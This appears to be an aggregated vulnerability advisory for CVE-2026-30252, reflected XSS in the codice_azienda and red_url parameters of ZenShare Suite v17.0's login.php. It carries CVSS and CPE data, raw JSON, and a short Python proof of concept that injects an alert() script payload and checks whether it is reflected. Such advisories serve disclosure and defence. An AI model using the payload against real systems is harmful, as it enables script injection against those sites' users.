Security Vulnerability Report
中文
CVE-2026-30252 CVSS 6.1 MEDIUM

CVE-2026-30252

Published: 2026-04-02 21:16:40
Last Modified: 2026-04-10 15:50:07

Description

Multiple reflected cross-site scripting (XSS) vulnerabilities in the login.php endpoint of Interzen Consulting S.r.l ZenShare Suite v17.0 allows attackers to execute arbitrary Javascript in the context of the user's browser via a crafted URL injected into the codice_azienda and red_url parameters.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:interzen:zencrm:17.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:interzen:zenhr:17.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:interzen:zenproject:17.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:interzen:zenpurchase:17.0:*:*:*:*:*:*:* - VULNERABLE
ZenShare Suite v17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL configuration target_url = "http://example.com/login.php" # Malicious payload to test XSS xss_payload = "<script>alert('XSS-CVE-2026-30252');</script>" # Parameters vulnerable to injection params = { "codice_azienda": xss_payload, "red_url": xss_payload } try: # Send GET request to the vulnerable endpoint response = requests.get(target_url, params=params, timeout=10) # Verify if the payload is reflected in the response if xss_payload in response.text: print("[+] PoC Successful: Vulnerability detected.") else: print("[-] PoC Failed: Payload might be filtered.") except Exception as e: print(f"[!] Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30252", "sourceIdentifier": "[email protected]", "published": "2026-04-02T21:16:40.490", "lastModified": "2026-04-10T15:50:06.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple reflected cross-site scripting (XSS) vulnerabilities in the login.php endpoint of Interzen Consulting S.r.l ZenShare Suite v17.0 allows attackers to execute arbitrary Javascript in the context of the user's browser via a crafted URL injected into the codice_azienda and red_url parameters."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:interzen:zencrm:17.0:*:*:*:*:*:*:*", "matchCriteriaId": "AF358C58-BDBB-49B1-A369-A68B23CCDF64"}, {"vulnerable": true, "criteria": "cpe:2.3:a:interzen:zenhr:17.0:*:*:*:*:*:*:*", "matchCriteriaId": "6B7C5D87-0DD7-49D4-8449-C13960981A2E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:interzen:zenproject:17.0:*:*:*:*:*:*:*", "matchCriteriaId": "151F4DBD-F656-435A-9352-9DE978766533"}, {"vulnerable": true, "criteria": "cpe:2.3:a:interzen:zenpurchase:17.0:*:*:*:*:*:*:*", "matchCriteriaId": "D976EEE6-1493-471B-B60B-AF06827B337C"}]}]}], "references": [{"url": "https://github.com/skit-cyber-security/ZenShare-Suite", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}